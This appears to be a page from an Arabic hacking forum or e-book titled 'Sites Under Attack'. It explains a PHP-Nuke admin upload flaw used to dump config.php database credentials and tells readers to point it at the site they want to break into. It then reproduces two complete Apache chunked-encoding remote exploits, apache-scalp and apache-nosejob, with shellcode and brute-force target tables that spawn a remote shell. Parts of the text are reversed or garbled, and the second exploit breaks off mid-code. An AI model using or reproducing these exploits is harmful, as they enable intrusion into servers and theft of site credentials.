hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
:php contains this routine.admin ...let me explain you the bug<br />
ridesab$ EMANELIF_TPIRCS$)dirname؛) =<br />
=extrows t$<br />
= sloctxet$<br />
= ridu$<br />
"/"=ridw$ (ridw$!)if<br />
$FileManager"=po؛" (lecnac$)if<br />
} (daolpu$)if<br />
؛٢٠<br />
؛٨٥<br />
FLES_PHP$)dirname؛)<br />
؛<br />
eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)<br />
noitcatsal$ $ridw؛"
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
٤٢<strong>١</strong> =php?sid.article/net.twlc.www//:net article http.twlc.www//:http<br />
<strong>com</strong>.bugtraq@securityfocus<br />
-good luck-org .phpnuke.www//:http<br />
Nuke Web -PHP :Project ٧٥<strong>١</strong><strong>١</strong>=di_puorg؟/tracker/net.sourceforge//:http<br />
Portal System<br />
and of course mailed to the author of php nuke<br />
remember that trojans are<br />
...bugs, ideas, insults, cool girls)tacts con<br />
:(null/dev/directed to<br />
net.lucisfero@twlc<br />
net.supergate@twlc<br />
(yes we are patched)net .twlc.www//:http<br />
.bella a tutti .peace out pimps<br />
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />
=-=-=-=-=-=-=-=-=-=-=-=<br />
الخطأ البرمجي :<br />
eof<br />
ridesab$ EMANELIF_TPIRCS$)dirname؛) =<br />
= swortxet$<br />
= sloctxet$<br />
= ridu$<br />
"/"=ridw$ (ridw$!)if<br />
$FileManager"=po؛" (lecnac$)if<br />
} (daolpu$)if<br />
؛٢٠<br />
؛٨٥<br />
FLES_PHP$)dirname؛)<br />
؛<br />
eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)<br />
noitcatsal$ $ridw؛"
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
FileManager=php?op.admin :Location")Header ؛")<br />
exit;<br />
{<br />
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />
=-=-=-=-=-=-=-=-=-=-=-=<br />
الثغرة :<br />
<strong>١</strong>=php?upload.admin/net.server.www//:http<br />
config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&<br />
txt.hacked=erfile_namephp&us.<br />
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />
=-=-=-=-=-=-=-=-=-=-=-=<br />
الثغرة بعد التعدیل<br />
<strong>١</strong>=php?upload.admin/net.server.www//:http<br />
php.config=elifresu&/=txt&wdir.ultramode=php&file_name.config=elif&<br />
txt.ultramode=eman_elifresu&<br />
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=<br />
=-=-=-=-=-=-=-=-=-=-=-=<br />
عملالثغرة:<br />
-= طبع مل فالكونفیج php.config الى المل فالنصيالموجودtxt.ultramodeلنتحتاجتحمیل<br />
مل ف نصيلطبعالمل ف<br />
كما هو موجودبالشرحالأنقلیزيیعنيفكر واستنتج :-) ولأن بع ض المواقعتمنعالتحمیلالىالموقعالآن<br />
ما علیك سو ىالدخولالى txt.ultramode/<strong>com</strong>.server//:http<br />
وستجدباس والیوزر التابعلقاعدةبیاناتالموقع=-<br />
ملاحظات<br />
<strong>١</strong>-بدل <strong>com</strong>.serverبالموقع الراداختراقه<br />
٢-تأكد من موقع المجلة مثال<br />
nuke/<strong>com</strong>.server//:ttph :<br />
٣- هذه الثغرةلاتعمل معاصدار٥٫٢كما یظنالبع ض...<br />
٢<strong>١</strong>٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
ثغرة<br />
" Chunked<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$$$$$<br />
angels-bytes<br />
$$$$$$$$$$$$$$$$$$$$$<br />
منقول من موقع<br />
كلنا سمع بثغرهتسمى Chunkedل ، Apache السبب لعدمتحد ث موقع angels-bytes عنها هو<br />
أنها أتتقبلإنطلاقالموقع ،الآ ن سأضع ، Scanner Retina Apache Chunked وهيأداة<br />
تقوم بفح ص نطاق من ٢٥٤ عنوان آيبي ، وتظهرلك ما منها مصاببهذهالثغره.<br />
إ ذاأردتمعالجة هذهالثغره عند وجودهافأنص حك بتنزیلأباتشي ٢٫٠٫٣٩فهو الأفضلالى الآن<br />
هذه هي وصلةالتنزی ل<br />
http://www.apache.org/dist/httpd/binaries<br />
أمالمسألة إ ستثمار هذهالثغرهفسو فأضعلكمأفضلأستثمارین<br />
الخطأفيأباتشي 1.3.24 واعلىإلى٢ و من٢إلى ، ٢٫٠٫٣٦ dev-وهيفيالروتین البرمجي الذي<br />
یتعامل مع رسائلالخطأ<br />
هذان ا لإ ستثمارانتستخدمان منقبل مهاجم بعید لتسبب طفح م حليفيالسیرفرالمصاب ، مؤدیهبذلكإلى<br />
إعادة كتابهفي الذاكرة ، وبطریقة ماتسمح لتنفیذكود<br />
/*((<br />
*/<br />
/*<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
قدتمتجریبها وإختبارها منقبل angels-bytes.<strong>com</strong>قبل وضعهالكمهنا<br />
حصلنا علیها من سیكورتيتیم*/<br />
((<br />
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming<br />
it failed */<br />
٢<strong>١</strong>٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
#define RET_ADDR_INC 512<br />
#define MEMCPY_s1_OWADDR_DELTA -146<br />
#define PADSIZE_1 4<br />
#define PADSIZE_2 5<br />
#define PADSIZE_3 7<br />
#define REP_POPULATOR 24<br />
#define REP_RET_ADDR 6<br />
#define REP_ZERO 36<br />
#define REP_SHELLCODE 24<br />
#define NOPCOUNT 1024<br />
#define NOP 0x41<br />
#define PADDING_1 \\'A\\'<br />
#define PADDING_2 \\'B\\'<br />
#define PADDING_3 \\'C\\'<br />
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);<br />
#define PUT_BYTES(n, b) memset(p, b, n); p += n;<br />
#define SHELLCODE_LOCALPORT_OFF 30<br />
char shellcode[] =<br />
\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\<br />
\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\<br />
\\x1f\\\"<br />
\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\<br />
\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\<br />
\\x02\\\"<br />
\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\<br />
\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\<br />
\\x04\\\"<br />
\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\<br />
\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\<br />
\\xb8\\\"<br />
\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\<br />
\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\<br />
\\x03\\\"<br />
\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\<br />
٢<strong>١</strong>٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\<br />
\\x89\\\"<br />
\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\<br />
\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\<br />
\\x80\\\"<br />
\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\<br />
\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\<br />
\\x50\\\"<br />
\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\<br />
\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\<br />
\\xcc\\\";<br />
struct {<br />
char *type;<br />
u_long retaddr;<br />
} targets[] = { // hehe, yes theo, that say OpenBSD here!<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },<br />
};<br />
int main(int argc, char *argv[]) {<br />
char *hostp, *portp;<br />
unsigned char buf[512], *expbuf, *p;<br />
int i, j, lport;<br />
int sock;<br />
int bruteforce, owned, progress;<br />
u_long retaddr;<br />
struct sockaddr_in sin, from;<br />
if(argc != 3) {<br />
printf(\\\"Usage: %s \\\\n\\\", argv[0]);<br />
printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\");<br />
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000<br />
٢<strong>١</strong>٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
127.0.0.1:8080\\\\n\\\");<br />
printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\");<br />
printf(\\\"Target ID / Target specification\\\\n\\\");<br />
for(i = 0; i < sizeof(targets)/8; i++)<br />
printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type);<br />
return -1;<br />
}<br />
hostp = strtok(argv[2], \\\":\\\");<br />
if((portp = strtok(NULL, \\\":\\\")) == NULL)<br />
portp = \\\"80\\\";<br />
retaddr = strtoul(argv[1], NULL, 16);<br />
if(retaddr < sizeof(targets)/8) {<br />
retaddr = targets[retaddr].retaddr;<br />
bruteforce = 0;<br />
}<br />
else<br />
bruteforce = 1;<br />
srand(getpid());<br />
signal(SIGPIPE, SIG_IGN);<br />
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {<br />
/* skip invalid return adresses */<br />
i = retaddr & 0xff;<br />
if(i == 0x0a || i == 0x0d)<br />
retaddr++;<br />
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))<br />
continue;<br />
sock = socket(AF_INET, SOCK_STREAM, 0);<br />
sin.sin_family = AF_INET;<br />
sin.sin_addr.s_addr = inet_addr(hostp);<br />
sin.sin_port = htons(atoi(portp));<br />
if(!progress)<br />
printf(\\\"\\\\n[*] Connecting.. \\\");<br />
٢<strong>١</strong>٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
fflush(stdout);<br />
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {<br />
perror(\\\"connect()\\\");<br />
exit(1);<br />
}<br />
if(!progress)<br />
printf(\\\"connected!\\\\n\\\");<br />
/* Setup the local port in our shellcode */<br />
i = sizeof(from);<br />
if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {<br />
perror(\\\"getsockname()\\\");<br />
exit(1);<br />
}<br />
lport = ntohs(from.sin_port);<br />
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;<br />
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;<br />
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *<br />
REP_SHELLCODE)<br />
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *<br />
REP_POPULATOR));<br />
PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\");<br />
for (i = 0; i < REP_SHELLCODE; i++) {<br />
PUT_STRING(\\\"X-\\\");<br />
PUT_BYTES(PADSIZE_3, PADDING_3);<br />
PUT_STRING(\\\": \\\");<br />
PUT_BYTES(NOPCOUNT, NOP);<br />
memcpy(p, shellcode, sizeof(shellcode) - 1);<br />
p += sizeof(shellcode) - 1;<br />
PUT_STRING(\\\"\\\\r\\\\n\\\");<br />
}<br />
for (i = 0; i < REP_POPULATOR; i++) {<br />
PUT_STRING(\\\"X-\\\");<br />
PUT_BYTES(PADSIZE_1, PADDING_1);<br />
٢<strong>١</strong>٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
PUT_STRING(\\\": \\\");<br />
for (j = 0; j < REP_RET_ADDR; j++) {<br />
*p++ = retaddr & 0xff;<br />
*p++ = (retaddr >> 8) & 0xff;<br />
*p++ = (retaddr >> 16) & 0xff;<br />
*p++ = (retaddr >> 24) & 0xff;<br />
}<br />
PUT_BYTES(REP_ZERO, 0);<br />
PUT_STRING(\\\"\\\\r\\\\n\\\");<br />
}<br />
PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");<br />
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);<br />
PUT_STRING(buf);<br />
PUT_BYTES(PADSIZE_2, PADDING_2);<br />
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",<br />
MEMCPY_s1_OWADDR_DELTA);<br />
PUT_STRING(buf);<br />
write(sock, expbuf, p - expbuf);<br />
progress++;<br />
if((progress%70) == 0)<br />
progress = 1;<br />
if(progress == 1) {<br />
memset(buf, 0, sizeof(buf));<br />
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport<br />
%u\\\",<br />
retaddr, (unsigned int)(p - expbuf), lport);<br />
memset(buf + strlen(buf), \\' \\', 74 - strlen(buf));<br />
puts(buf);<br />
if(bruteforce)<br />
putchar(\\';\\');<br />
}<br />
else<br />
putchar((rand()%2)? \\'P\\': \\'p\\');<br />
fflush(stdout);<br />
while (1) {<br />
٢٢٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
fd_set fds;<br />
int n;<br />
struct timeval tv;<br />
tv.tv_sec = EXPLOIT_TIMEOUT;<br />
tv.tv_usec = 0;<br />
FD_ZERO(&fds);<br />
FD_SET(0, &fds);<br />
FD_SET(sock, &fds);<br />
memset(buf, 0, sizeof(buf));<br />
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {<br />
if(FD_ISSET(sock, &fds)) {<br />
if((n = read(sock, buf, sizeof(buf) - 1)) = 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0) {<br />
printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n\\\");<br />
printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr);<br />
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD<br />
local kernel exploit to gain instant r00t\\\\n\\\");<br />
write(sock, expbuf, strlen(expbuf));<br />
owned++;<br />
}<br />
write(1, buf, n);<br />
}<br />
if(FD_ISSET(0, &fds)) {<br />
if((n = read(0, buf, sizeof(buf) - 1)) < 0)<br />
exit(1);<br />
write(sock, buf, n);<br />
}<br />
}<br />
if(!owned)<br />
break;<br />
}<br />
free(expbuf);<br />
٢٢<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
close(sock);<br />
if(owned)<br />
return 0;<br />
if(!bruteforce) {<br />
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");<br />
return -1;<br />
}<br />
}<br />
return 0;<br />
}<br />
Exploit #2:<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#ifdef __linux__<br />
#include<br />
#endif<br />
#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */<br />
#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another<br />
bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n\\\"<br />
#define RET_ADDR_INC 512<br />
#define PADSIZE_1 4<br />
#define PADSIZE_2 5<br />
#define PADSIZE_3 7<br />
٢٢٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
#define REP_POPULATOR 24<br />
#define REP_SHELLCODE 24<br />
#define NOPCOUNT 1024<br />
#define NOP 0x41<br />
#define PADDING_1 \\'A\\'<br />
#define PADDING_2 \\'B\\'<br />
#define PADDING_3 \\'C\\'<br />
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);<br />
#define PUT_BYTES(n, b) memset(p, b, n); p += n;<br />
char shellcode[] =<br />
\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\<br />
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\<br />
\\x04\\\\x24\\\"<br />
\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\<br />
\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\<br />
\\xea\\\\x31\\\"<br />
\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\<br />
\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\<br />
\\x7c\\\\x24\\\"<br />
\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\<br />
\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\<br />
\\x20\\\\x89\\\"<br />
\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\<br />
\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\<br />
\\x14\\\\x89\\\"<br />
\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\<br />
\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\<br />
\\xcd\\\\x80\\\"<br />
\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\<br />
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\<br />
\\x04\\\\x24\\\"<br />
\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\<br />
\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\<br />
\\x50\\\\xb0\\\"<br />
\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\<br />
\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\<br />
\\x41\\\\x80\\\"<br />
\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\<br />
\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\<br />
٢٢٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
\\xb0\\\\x5a\\\"<br />
\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\<br />
\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\<br />
\\xc0\\\\x50\\\"<br />
\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\<br />
\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\<br />
\\x2a\\\\x47\\\"<br />
\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\<br />
\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\<br />
\\xcd\\\\x80\\\"<br />
\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\<br />
\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\<br />
\\xe3\\\\x50\\\"<br />
\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\<br />
\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";<br />
;<br />
struct {<br />
char *type; /* description for newbie penetrator */<br />
int delta; /* delta thingie! */<br />
u_long retaddr; /* return address */<br />
int repretaddr; /* we repeat retaddr thiz many times in the buffer */<br />
int repzero; /* and \\\\0\\'z this many times */<br />
} targets[] = { // hehe, yes theo, that say OpenBSD here!<br />
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36 },<br />
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36 },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },<br />
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },<br />
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,<br />
36 },<br />
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42 },<br />
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />
}, victim;<br />
٢٢٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
void usage(void) {<br />
int i;<br />
printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apachenosejob.c\\\\n\\\\n\\\");<br />
printf(\\\"Usage: ./apache-nosejob -h host[:80]\\\\n\\\");<br />
printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\");<br />
printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\");<br />
printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n\\\");<br />
printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n\\\");<br />
printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,<br />
0x080e0000/nbsd.\\\\n\\\");<br />
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to<br />
overwrite\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\");<br />
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the<br />
buffer\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n\\\");<br />
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the<br />
buffer\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n\\\");<br />
printf(\\\" Optional stuff:\\\\n\\\");<br />
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for<br />
shellcode reply\\\\n\\\");<br />
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode<br />
replies\\\\n\\\");<br />
printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\");<br />
printf(\\\"\\\\nExamples will be published in up<strong>com</strong>ing apache-scalp-<br />
HOWTO.pdf\\\\n\\\");<br />
printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n\\\");<br />
printf(\\\" ID / Return addr / Target specification\\\\n\\\");<br />
for(i = 0; i < sizeof(targets)/sizeof(victim); i++)<br />
printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type);<br />
exit(1);<br />
}<br />
٢٢٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
int main(int argc, char *argv[]) {<br />
char *hostp, *portp, *cmdz = DEFAULT_CMDZ;<br />
u_char buf[512], *expbuf, *p;<br />
int i, j, lport, sock;<br />
int bruteforce, owned, progress, sc_timeout = 5;<br />
int responses, shown_length = 0;<br />
struct in_addr ia;<br />
struct sockaddr_in sin, from;<br />
struct hostent *he;<br />
if(argc < 4)<br />
usage();<br />
bruteforce = 0;<br />
memset(&victim, 0, sizeof(victim));<br />
while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1) {<br />
switch(i) {<br />
/* required stuff */<br />
case \\'h\\':<br />
hostp = strtok(optarg, \\\":\\\");<br />
if((portp = strtok(NULL, \\\":\\\")) == NULL)<br />
portp = \\\"80\\\";<br />
break;<br />
/* predefined targets */<br />
case \\'t\\':<br />
if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {<br />
printf(\\\"Invalid target\\\\n\\\");<br />
return -1;<br />
}<br />
memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));<br />
break;<br />
/* bruteforce! */<br />
case \\'b\\':<br />
bruteforce++;<br />
victim.type = \\\"Custom target\\\";<br />
victim.retaddr = strtoul(optarg, NULL, 16);<br />
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",<br />
٢٢٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
victim.retaddr);<br />
break;<br />
case \\'d\\':<br />
victim.delta = atoi(optarg);<br />
printf(\\\"Using %d as delta\\\\n\\\", victim.delta);<br />
break;<br />
case \\'r\\':<br />
victim.repretaddr = atoi(optarg);<br />
printf(\\\"Repeating the return address %d times\\\\n\\\",<br />
victim.repretaddr);<br />
break;<br />
case \\'z\\':<br />
victim.repzero = atoi(optarg);<br />
printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero);<br />
break;<br />
case \\'o\\':<br />
bruteforce++;<br />
switch(*optarg) {<br />
case \\'f\\':<br />
victim.type = \\\"FreeBSD\\\";<br />
